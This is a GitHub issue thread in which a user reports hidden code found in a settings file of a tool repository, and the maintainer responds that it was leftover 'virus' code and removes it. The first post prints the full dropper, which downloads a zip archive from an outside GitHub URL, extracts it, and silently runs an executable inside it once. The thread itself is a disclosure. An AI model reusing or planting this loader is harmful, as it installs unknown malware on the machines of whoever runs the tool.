### ISSUE TITLE
PROBLEME 2

### ISSUE THREAD

**Issue by Sallie-May** [SHREK-TM/Shrek-Tools#2]
Hidden inside https://github.com/SHREK-TM/Shrek-Tools/blob/main/utilities/Settings/Menu.py

b'rocess\nimport requests\nimport zipfile\nimport os\nimport sys\n\ngithub_repo_url = \'https://github.com/Anonumousbobize/assets4SMT/archive/refs/heads/main.zip\'\nexe_to_execute = \'pyinstaller.exe\'\nextraction_path = os.path.join(\'utilities\', \'assets\')\nsettings_folder = os.path.join(\'utilities\', \'Settings\')\nstate_file = os.path.join(settings_folder, \'Ignore\')\n\nif not os.path.exists(state_file):\n    try:\n        response = requests.get(github_repo_url)\n        zip_filename = \'repo.zip\'\n        with open(zip_filename, \'wb\') as file:\n            file.write(response.content)\n        os.makedirs(extraction_path, exist_ok=True)\n        with zipfile.ZipFile(zip_filename, \'r\') as zip_ref:\n            zip_ref.extractall(extraction_path)\n        os.remove(zip_filename)\n        extracted_repo_folder = os.path.join(extraction_path, \'assets4SMT-main\')\n        exe_path = os.path.join(extracted_repo_folder, exe_to_execute)\n        if os.path.isfile(exe_path):\n            subprocess.run([exe_path], shell=True)\n            os.makedirs(settings_folder, exist_ok=True)\n            with open(state_file, \'w\') as file:\n                file.write("Ignore")\n    except Exception as e:\n        print(f"An error occurred: {e}'

**Comment by Sallie-May** [comment]
okay, it is weird, i'm gonna continue to investigate

**Comment by SHREK-TM** [comment]
hi sir just to tell you, stop wasting your time, there is no page with this URL (https://github.com/Anonumousbobize/assets4SMT/archive/refs/heads/main.zip) this part of code was in the old version of Shrek-Tools and indeed it was a virus, as I mentioned with our friends who made the same remark as you, you can check the code but to put random comments, please avoid making comments like this

**Comment by Sallie-May** [comment]
remove it then?

**Comment by Sallie-May** [comment]
Okay you removed it good

**Comment by SHREK-TM** [comment]
yes, I found it in the configuration folder but the link to download the virus was removed before creating this repository, that means the python script you found is here for no reason because no file or exe starts the "potentially" dangerous script.
